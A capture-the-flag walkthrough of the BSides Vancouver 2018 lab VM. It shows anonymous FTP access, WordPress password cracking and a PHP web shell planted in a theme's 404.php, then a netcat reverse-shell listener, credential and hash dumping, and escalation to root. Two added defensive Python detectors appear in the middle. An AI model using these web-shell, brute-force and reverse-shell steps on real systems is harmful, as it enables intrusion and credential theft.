BSides-Vancouver-2018-Workshop - Vulnyx - Level: Medium - Report

Medium

Tools Used

nmap
gobuster
wpscan
ftp
hydra
curl
grep

Reconnaissance

As the first step of the reconnaissance phase, we use arp-scan to identify active hosts on the network. This lets us locate the target system quickly.

┌──(root㉿cyber)-[~]
└─# arp-scan -l
192.168.2.137 08:00:27:ae:29:fe PCS Systemtechnik GmbH

Here we see the MAC address and the vendor of the network adapter. This can give further hints about the operating system or the type of device.

To resolve the hostname, we add the discovered host to the /etc/hosts file. This makes further work with the target easier, because we can use the hostname instead of the IP address.

┌──(root㉿cyber)-[~]
└─# vi /etc/hosts
192.168.2.137 bsides.vuln

Web Enumeration

Gobuster is used to find hidden directories and files on the web server.

┌──(root㉿cyber)-[~]
└─# gobuster dir -u http://bsides.vuln -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx,bak -w "/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt" -b '403,404' -e --no-error
==============================================================================================================================

http://bsides.vuln/index (Status: 200) [Size: 177]
http://bsides.vuln/index.html (Status: 200) [Size: 177]
http://bsides.vuln/robots.txt (Status: 200) [Size: 43]
http://bsides.vuln/robots (Status: 200) [Size: 43]
http://bsides.vuln/backup_wordpress/index.php (Status: 301) [Size: 0] [--> http://bsides.vuln/backup_wordpress/]
http://bsides.vuln/backup_wordpress/index (Status: 301) [Size: 0] [--> http://bsides.vuln/backup_wordpress/index/]
http://bsides.vuln/backup_wordpress/wp-content (Status: 301) [Size: 332] [--> http://bsides.vuln/backup_wordpress/wp-content/]
http://bsides.vuln/backup_wordpress/wp-login (Status: 200) [Size: 2373]
http://bsides.vuln/backup_wordpress/wp-login.php (Status: 200) [Size: 2373]
http://bsides.vuln/backup_wordpress/license (Status: 200) [Size: 19935]
http://bsides.vuln/backup_wordpress/license.txt (Status: 200) [Size: 19935]
http://bsides.vuln/backup_wordpress/wp-includes (Status: 301) [Size: 333] [--> http://bsides.vuln/backup_wordpress/wp-includes/]
http://bsides.vuln/backup_wordpress/readme (Status: 200) [Size: 7358]
http://bsides.vuln/backup_wordpress/readme.html (Status: 200) [Size: 7358]
http://bsides.vuln/backup_wordpress/wp-trackback (Status: 200) [Size: 135]
http://bsides.vuln/backup_wordpress/wp-trackback.php (Status: 200) [Size: 135]

==============================================================================================================================
http://bsides.vuln/robots.txt

User-agent: *
Disallow: /backup_wordpress

==============================================================================================================================
http://bsides.vuln/index.html
john
Posted on March 7, 2018
Leave a comment on [Retired] This blog is no longer being maintained

Hello world!

Welcome to WordPress.
Author admin

Posted on March 7, 2018
1 Comment
http://bsides.vuln/backup_wordpress/wp-login.php

ERROR: The password you entered for the
username admin is incorrect.
Lost your password?

Initial Access

WPScan is used later in this phase to gather WordPress-specific information and identify vulnerabilities. First, a full Nmap port scan shows which services the host exposes.

┌──(root㉿cyber)-[~]
└─# nmap -sS -sC -T5 -AO 192.168.2.137 -p- | grep open
21/tcp open ftp vsftpd 2.3.5
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
┌──(root㉿cyber)-[~]
└─# nmap -sS -sC -T5 -AO 192.168.2.137 -p-
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-14 00:06 CEST
Nmap scan report for bsides.vuln (192.168.2.137)
Host is up (0.00014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.5
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.2.127
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 2.3.5 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 859f8b5844973398ee98b0c185603c41 (DSA)
| 2048 cf1a04e17ba3cd2bd1af7db330e0a09d (RSA)
|_ 256 97e5287a314d0a89b2b02581d536634c (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/backup_wordpress
|_http-server-header: Apache/2.2.22 (Ubuntu)
MAC Address: 08:00:27:AE:29:FE (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

The Nmap result shows that an FTP server is running and allows anonymous access.

┌──(root㉿cyber)-[~]
└─# ftp 192.168.2.137
Connected to 192.168.2.137.
220 (vsFTPd 2.3.5)
Name (192.168.2.137:cyber): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||45073|).
150 Here comes the directory listing.
drwxr-xr-x 3 0 0 4096 Mar 03 2018 .
drwxr-xr-x 3 0 0 4096 Mar 03 2018 ..
drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 public
226 Directory send OK.

The anonymous FTP login succeeds.

ftp> cd public
250 Directory successfully changed.
ftp> ls l-a
229 Entering Extended Passive Mode (|||37718|).
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -la
229 Entering Extended Passive Mode (|||39715|).
150 Here comes the directory listing.
drwxr-xr-x 2 65534 65534 4096 Mar 03 2018 .
drwxr-xr-x 3 0 0 4096 Mar 03 2018 ..
-rw-r--r-- 1 0 0 31 Mar 03 2018 users.txt.bk
226 Directory send OK.
ftp> get users.txt.bk
local: users.txt.bk remote: users.txt.bk
229 Entering Extended Passive Mode (|||62283|).
150 Opening BINARY mode data connection for users.txt.bk (31 bytes).
100% |*************************************************| 31 110.08 KiB/s 00:00 ETA
226 Transfer complete.
31 bytes received in 00:00 (61.03 KiB/s)
ftp> put h
hack.txt hash hydra.restore

ftp> put hack.txt
local: hack.txt remote: hack.txt
229 Entering Extended Passive Mode (|||17502|).
550 Permission denied.
ftp> cd /home
550 Failed to change directory

The file users.txt.bk was downloaded.

┌──(root㉿cyber)-[~]
└─# cat users.txt.bk
abatchy
john
mai
anne
doomguy
┌──(root㉿cyber)-[~]
└─# wpscan --url http://bsides.vuln/backup_wordpress --usernames john --passwords /usr/share/wordlists/rockyou.txt
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <===============> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - john / enigma
Trying john / enigma Time: 00:00:01 < > (15 / 14344413) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
 | Username: john, Password: enigma
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 0
| Requests Remaining: 23

[+] Finished: Wed Jun 14 00:25:00 2023
[+] Requests Done: 157
[+] Cached Requests: 40
[+] Data Sent: 48.108 KB
[+] Data Received: 41.151 KB
[+] Memory used: 259.852 MB
[+] Elapsed time: 00:00:07

The WordPress login credentials are cracked.

plugin lfi exploit

Edit Themes
Twenty Sixteen: 404 Template (404.php)
Select theme to edit:
<?php system($_GET['cmd']);
/**
* The template for displaying 404 pages (not found)
*
* @package WordPress
* @subpackage Twenty_Sixteen
* @since Twenty Sixteen 1.0
*/
?>
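
A defender's view of the edited template above, as an added example that is not part of the original report: a scan of a theme directory for PHP lines that pass request parameters to command-execution functions. The function names, the pattern and the sample files are assumptions constructed for this demo.

```python
import re
import tempfile
from pathlib import Path

# PHP functions that run OS commands, and request superglobals a client controls.
EXEC_FUNCS = r"(?:system|exec|shell_exec|passthru|popen|proc_open)"
REQUEST_VARS = r"\$_(?:GET|POST|REQUEST|COOKIE)\b"
# Flag a call whose argument list references request data within the same statement.
PATTERN = re.compile(rf"\b{EXEC_FUNCS}\s*\([^;]*{REQUEST_VARS}", re.IGNORECASE)


def scan_theme_dir(root):
    """Return (relative_path, line_no, line) for every suspicious line in *.php files."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for no, line in enumerate(text.splitlines(), start=1):
            if PATTERN.search(line):
                findings.append((path.relative_to(root).as_posix(), no, line.strip()))
    return findings


def build_sample_tree(root):
    """Constructed sample: one clean template and one edited like the 404.php above."""
    theme = Path(root) / "twentysixteen"
    theme.mkdir(parents=True)
    (theme / "index.php").write_text("<?php\nget_header();\nget_footer();\n")
    (theme / "404.php").write_text(
        "<?php system($_GET['cmd']);\n"
        "/**\n * The template for displaying 404 pages (not found)\n */\n"
        "get_header();\n"
    )
    return theme.parent


def demo():
    """Scan the constructed tree and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_theme_dir(build_sample_tree(tmp))


if __name__ == "__main__":
    for rel, no, line in demo():
        print(f"{rel}:{no}: {line}")
```

A line-based pattern like this misses obfuscated or multi-line variants, so it complements rather than replaces a comparison of theme files against the checksums of the released theme.
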
┌──(root㉿cyber)-[~]
└─# curl "http://bsides.vuln/backup_wordpress/wp-content/themes/twentysixteen/404.php?cmd=ls"
404.php
archive.php
comments.php
css
footer.php
functions.php
genericons
header.php
image.php
inc
index.php
js
languages
page.php
readme.txt
rtl.css
screenshot.png
search.php
searchform.php
sidebar-content-bottom.php
sidebar.php
single.php
style.css
template-parts

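LFI vulnerability found. Strictly speaking this is command execution rather than file inclusion: the edited 404.php passes the cmd parameter to system().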
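
Both the XML-RPC password attack and the request to 404.php?cmd=ls leave traces in the web server's access log. The following added example (not part of the original report) flags them, assuming Apache's combined log format; the sample lines, the second client 192.168.2.50 and the threshold are constructed assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: client, identity, user, [time], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} '
)
# A PHP file inside a theme directory, requested directly.
THEME_PHP = re.compile(r"/wp-content/themes/[^/]+/(?:.+/)?[^/]+\.php$")
XMLRPC_THRESHOLD = 5  # assumed; tune to the site's normal XML-RPC traffic


def analyse(lines, threshold=XMLRPC_THRESHOLD):
    """Return clients with many xmlrpc.php POSTs and direct theme-file requests with parameters."""
    xmlrpc_posts = Counter()
    theme_hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line
        url = urlsplit(m["target"])
        if m["method"] == "POST" and url.path.endswith("/xmlrpc.php"):
            xmlrpc_posts[m["ip"]] += 1
        elif THEME_PHP.search(url.path) and url.query:
            # Templates are loaded by WordPress itself; a direct hit with a query is unusual.
            theme_hits.append((m["ip"], url.path, sorted(parse_qs(url.query))))
    brute = {ip: n for ip, n in xmlrpc_posts.items() if n >= threshold}
    return {"xmlrpc_bruteforce": brute, "theme_file_requests": theme_hits}


def sample_log():
    """Constructed sample lines; timestamps and sizes are invented."""
    fmt = '{ip} - - [14/Jun/2023:00:2{i}:00 +0200] "{req} HTTP/1.1" 200 512 "-" "-"'
    base = "/backup_wordpress"
    rows = [("192.168.2.127", f"POST {base}/xmlrpc.php")] * 6
    rows += [
        ("192.168.2.50", f"POST {base}/xmlrpc.php"),
        ("192.168.2.50", f"GET {base}/wp-content/themes/twentysixteen/style.css?ver=4.5"),
        ("192.168.2.127", f"GET {base}/wp-content/themes/twentysixteen/404.php?cmd=ls"),
    ]
    return [fmt.format(ip=ip, i=i, req=req) for i, (ip, req) in enumerate(rows)]


if __name__ == "__main__":
    print(analyse(sample_log()))
```
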

┌──(root㉿cyber)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.127] from (UNKNOWN) [192.168.2.137] 35734
bash: no job control in this shell backup_wordpress/wp-content/themes/twentysixteen$

A reverse shell was established here.

www-data@bsides2018:/var/www/backup_wordpress$ cat wp-config.php
define('DB_NAME', 'wp');
define('DB_USER', 'john@localhost');
define('DB_PASSWORD', 'thiscannotbeit');

The configuration of the WordPress site was read out.

www-data@bsides2018:/var/www/backup_wordpress$ ls -la /home/
drwxr-xr-x 7 root root 4096 Mar 4 2018 .
drwxr-xr-x 23 root root 4096 Mar 3 2018 ..
drwxr-xr-x 19 abatchy abatchy 4096 Mar 7 2018 abatchy
drwxr-xr-x 2 anne anne 4096 Mar 4 2018 anne
drwxr-xr-x 2 doomguy doomguy 4096 Mar 3 2018 doomguy
drwxr-xr-x 2 john john 4096 Mar 3 2018 john
drwxr-xr-x 2 mai mai 4096 Mar 3 2018 mai
www-data@bsides2018:/var/www/backup_wordpress$ ss -altpn
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 50 127.0.0.1:3306 *:*
LISTEN 0 128 :::80 :::*
LISTEN 0 5 127.0.0.1:53 *:*
LISTEN 0 32 *:21 *:*
LISTEN 0 128 :::22 :::*
LISTEN 0 128 *:22 *:*
LISTEN 0 128 127.0.0.1:631 *:*
LISTEN 0 128 ::1:631 :::*
www-data@bsides2018:/var/www/backup_wordpress$ mysql -u john@localhost -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1630
Server version: 5.5.54-0ubuntu0.12.04.1 (Ubuntu)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| wp                 |
+--------------------+
2 rows in set (0.00 sec)
use wp;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
show tables;
+-----------------------+
| Tables_in_wp |
+-----------------------+
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_termmeta |
| wp_terms |
| wp_usermeta |
| wp_users |
+-----------------------+
12 rows in set (0.00 sec)
select * from wp_users;
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
| 1 | admin | $P$BmuGRQyHFjh1FW29/KN6GvfYnwIl/O0 | admin | admin@thissite.com | | 2018-03-07 20:05:07 | | 0 | admin |
| 2 | john | $P$BVlPsus0zgh1RoU3VGUI4zfyNNPcyT0 | john | john@thissite.com | | 2018-03-07 20:06:16 | | 0 | john |
+----+------------+------------------------------------+---------------+--------------------+----------+---------------------+---------------------+-------------+--------------+
2 rows in set (0.00 sec)
www-data@bsides2018:/var/www/backup_wordpress$ ls -la /home/ -R
/home/:
total 28
drwxr-xr-x 7 root root 4096 Mar 4 2018 .
drwxr-xr-x 23 root root 4096 Mar 3 2018 ..
drwxr-xr-x 19 abatchy abatchy 4096 Mar 7 2018 abatchy
drwxr-xr-x 2 anne anne 4096 Mar 4 2018 anne
drwxr-xr-x 2 doomguy doomguy 4096 Mar 3 2018 doomguy
drwxr-xr-x 2 john john 4096 Mar 3 2018 john
drwxr-xr-x 2 mai mai 4096 Mar 3 2018 mai

/home/abatchy:
total 108
drwxr-xr-x 19 abatchy abatchy 4096 Mar 7 2018 .
drwxr-xr-x 7 root root 4096 Mar 4 2018 ..
-rw------- 1 abatchy abatchy 334 Mar 7 2018 .ICEauthority
-rw------- 1 abatchy abatchy 0 Mar 7 2018 .Xauthority
-rw------- 1 abatchy abatchy 16 Mar 7 2018 .bash_history
drwx------ 11 abatchy abatchy 4096 Mar 7 2018 .cache
drwx------ 8 abatchy abatchy 4096 Mar 7 2018 .config
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 .dbus
-rw-r--r-- 1 abatchy abatchy 25 Mar 7 2018 .dmrc
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 .gconf
drwx------ 4 abatchy abatchy 4096 Mar 7 2018 .gnome2
-rw-rw-r-- 1 abatchy abatchy 147 Mar 7 2018 .gtk-bookmarks
drwx------ 2 abatchy abatchy 4096 Mar 6 2018 .gvfs
drwxr-xr-x 3 abatchy abatchy 4096 Mar 7 2018 .local
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 .mission-control
drwx------ 2 abatchy abatchy 4096 Mar 7 2018 .pulse
-rw------- 1 abatchy abatchy 256 Mar 7 2018 .pulse-cookie
-rw------- 1 abatchy abatchy 10431 Mar 7 2018 .xsession-errors
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Desktop
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Documents
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Downloads
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Music
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Pictures
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Public
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Templates
drwxr-xr-x 2 abatchy abatchy 4096 Mar 7 2018 Videos

/home/abatchy/.local/share:
total 24
drwxr-xr-x 5 abatchy abatchy 4096 Mar 7 2018 .
drwxr-xr-x 3 abatchy abatchy 4096 Mar 7 2018 ..
-rw-rw-r-- 1 abatchy abatchy 0 Mar 7 2018 .converted-launchers
-rw-rw-r-- 1 abatchy abatchy 834 Mar 7 2018 gsettings-data-convert
drwxrwxr-x 2 abatchy abatchy 4096 Mar 7 2018 icc
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 telepathy
drwx------ 3 abatchy abatchy 4096 Mar 7 2018 zeitgeist

/home/doomguy:
total 32
drwxr-xr-x 2 doomguy doomguy 4096 Mar 3 2018 .
drwxr-xr-x 7 root root 4096 Mar 4 2018 ..
-rw-r--r-- 1 doomguy doomguy 220 Mar 3 2018 .bash_logout
-rw-r--r-- 1 doomguy doomguy 3486 Mar 3 2018 .bashrc
-rw-r--r-- 1 doomguy doomguy 675 Mar 3 2018 .profile
-rw-r--r-- 1 doomguy doomguy 8445 Mar 3 2018 examples.desktop

/home/john:
total 32
drwxr-xr-x 2 john john 4096 Mar 3 2018 .
drwxr-xr-x 7 root root 4096 Mar 4 2018 ..
-rw-r--r-- 1 john john 220 Mar 3 2018 .bash_logout
-rw-r--r-- 1 john john 3486 Mar 3 2018 .bashrc
-rw-r--r-- 1 john john 675 Mar 3 2018 .profile
-rw-r--r-- 1 john john 8445 Mar 3 2018 examples.desktop

/home/mai:
total 32
drwxr-xr-x 2 mai mai 4096 Mar 3 2018 .
drwxr-xr-x 7 root root 4096 Mar 4 2018 ..
-rw-r--r-- 1 mai mai 220 Mar 3 2018 .bash_logout
-rw-r--r-- 1 mai mai 3486 Mar 3 2018 .bashrc
-rw-r--r-- 1 mai mai 675 Mar 3 2018 .profile
-rw-r--r-- 1 mai mai 8445 Mar 3 2018 examples.desktop
www-data@bsides2018:/var/www/backup_wordpress$ find / -type f -perm -4000 -ls 2>/dev/null
262307 68 -rwsr-xr-x 1 root root 67720 Mar 29 2012 /bin/umount
262197 28 -rwsr-xr-x 1 root root 26252 Mar 2 2012 /bin/fusermount
262271 40 -rwsr-xr-x 1 root root 39116 Nov 8 2011 /bin/ping6
262270 36 -rwsr-xr-x 1 root root 34740 Nov 8 2011 /bin/ping
262232 88 -rwsr-xr-x 1 root root 88760 Mar 29 2012 /bin/mount
262298 32 -rwsr-xr-x 1 root root 31116 Sep 12 2012 /bin/su
272145 12 -rwsr-xr-x 1 root root 9760 Sep 11 2013 /usr/lib/policykit-1/polkit-agent-helper-1
266093 312 -rwsr-xr-- 1 root messagebus 316824 Jun 13 2013 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
292699 244 -rwsr-xr-x 1 root root 248056 Aug 11 2016 /usr/lib/openssh/ssh-keysign
266105 8 -rwsr-xr-x 1 root root 5564 Dec 13 2011 /usr/lib/eject/dmcrypt-get-device
265644 12 -rwsr-xr-x 1 root root 9728 Sep 30 2013 /usr/lib/pt_chown
262496 16 -rwsr-xr-x 1 root root 13860 Nov 8 2011 /usr/bin/arping
262502 44 -rwsr-sr-x 1 daemon daemon 42800 Oct 25 2011 /usr/bin/at
262576 40 -rwsr-xr-x 1 root root 40292 Sep 12 2012 /usr/bin/chfn
263538 16 -rwsr-xr-x 1 root root 14012 Nov 8 2011 /usr/bin/traceroute6.iputils
263493 72 -rwsr-xr-x 1 root root 69708 Feb 27 2013 /usr/bin/sudo
263162 56 -rwsr-xr-x 1 root root 56208 Jul 28 2011 /usr/bin/mtr
262838 60 -rwsr-xr-x 1 root root 57956 Sep 12 2012 /usr/bin/gpasswd
263231 44 -rwsr-xr-x 1 root root 41284 Sep 12 2012 /usr/bin/passwd
263182 32 -rwsr-xr-x 1 root root 30896 Sep 12 2012 /usr/bin/newgrp
263069 12 -rwsr-xr-x 1 root lpadmin 9768 May 13 2013 /usr/bin/lppasswd
263494 72 -rwsr-xr-x 1 root root 69708 Feb 27 2013 /usr/bin/sudoedit
262579 32 -rwsr-xr-x 1 root root 31748 Sep 12 2012 /usr/bin/chsh
262449 12 -rwsr-sr-x 1 root root 9524 Jan 6 2014 /usr/bin/X
263276 20 -rwsr-xr-x 1 root root 18104 Sep 11 2013 /usr/bin/pkexec
274568 20 -rwsr-sr-x 1 libuuid libuuid 17976 Mar 29 2012 /usr/sbin/uuidd
274493 268 -rwsr-xr-- 1 root dip 273272 Feb 4 2011 /usr/sbin/pppd

Searching for SUID executables.

┌──(root㉿cyber)-[~]
└─# hydra -l anne -P /usr/share/wordlists/rockyou.txt http-get://192.168.2.137/backup_wordpress
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-06-14 00:56:27
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344405 login tries (l:1/p:14344405), ~896526 tries per task
[DATA] attacking http://192.168.2.137:80/backup_wordpress
[80][http-get] host: 192.168.2.137 login: anne password: imdrippinbiatch
[80][http-get] host: 192.168.2.137 login: anne password: 123456
[80][http-get] host: 192.168.2.137 login: anne password: sqluserrootpassw0r4
[80][http-get] host: 192.168.2.137 login: anne password: hostinger
[80][http-get] host: 192.168.2.137 login: anne password: y0uC@n'tbr3akIT
[80][http-get] host: 192.168.2.137 login: anne password: 12345
[80][http-get] host: 192.168.2.137 login: anne password: 123456789
[80][http-get] host: 192.168.2.137 login: anne password: password
[80][http-get] host: 192.168.2.137 login: anne password: iloveyou
[80][http-get] host: 192.168.2.137 login: anne password: princess
[80][http-get] host: 192.168.2.137 login: anne password: 1234567
[80][http-get] host: 192.168.2.137 login: anne password: rockyou
[80][http-get] host: 192.168.2.137 login: anne password: 12345678
[80][http-get] host: 192.168.2.137 login: anne password: enigma
[80][http-get] host: 192.168.2.137 login: anne password: highschoolmusical
[80][http-get] host: 192.168.2.137 login: anne password: abc123
1 of 1 target successfully completed, 16 valid passwords found

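Hydra is used to brute-force passwords. Note that 16 different "valid" passwords for a single login, one per parallel task, is the signature of a false positive: the http-get module tests HTTP authentication, and /backup_wordpress does not request any, so every attempt is reported as a hit.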

www-data@bsides2018:/var/backups$ su anne
Password: princess
anne@bsides2018:/var/backups$ sudo -l
[sudo] password for anne:
Matching Defaults entries for anne on this host:
env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User anne may run the following commands on this host:
(ALL : ALL) ALL
anne@bsides2018:/var/backups$ sudo su
root@bsides2018:/var/backups# cat /root/flag.txt
Congratulations!

If you can read this, that means you were able to obtain root permissions on this VM.
You should be proud!

There are multiple ways to gain access remotely, as well as for privilege escalation.
Did you find them all?

@abatchy17

Flags

Root.txt 5C42D6BB0EE9CE4CB7E7349652C45C4A
cat user.txt c7d0a8de1e03b25a6f7ed2d91b94dad6